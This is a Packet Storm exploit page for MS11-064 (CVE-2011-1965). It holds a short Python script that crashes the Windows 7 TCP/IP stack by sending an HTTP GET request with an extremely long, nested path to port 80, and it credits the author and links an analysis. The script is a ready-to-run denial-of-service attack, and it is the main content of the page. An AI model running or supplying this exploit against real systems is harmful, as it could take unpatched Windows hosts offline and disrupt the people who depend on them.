what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MS11-064 TCP/IP Stack Denial Of Service

MS11-064 TCP/IP Stack Denial Of Service
Posted Oct 16, 2011
Authored by Byoungyoung Lee

This exploit demonstrates denial of service vulnerabilities in the Windows TCP/IP stack as outlined in MS11-064.

tags | exploit, denial of service, tcp, vulnerability
systems | windows
advisories | CVE-2011-1965
SHA-256 | 471ae2bada5d0b38fd72c862eb89a058ec3a822b1b81c073d91414299fd67a81

MS11-064 TCP/IP Stack Denial Of Service

Change Mirror Download
# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could Allow Denial of Service
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Version: Windows 7 32bit, fully patched until Aug 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-1965

# analysis is available -
http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/

------------------------------------------------------------------------------------------------------
# Byoungyoung Lee, http://twitter.com/mylifeasageek
import struct
import socket

HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:)
PORT= 80

def tryOnce(i,j):
print hex(i), hex(j)
filename = ["a"*0x100 for x in range(i)]

filename = "/".join(filename)
filename += "/" + "b" * j
print "filename len : ", hex(len(filename))

hostname = "www.darungrim.org"

header = "GET /%s\n" % filename
header += "HOST: %s\n\n\n" % hostname

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(header)
response = s.recv(1024)
s.close()
print response
return

if __name__ == '__main__':
tryOnce(0x3c,0x7)

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close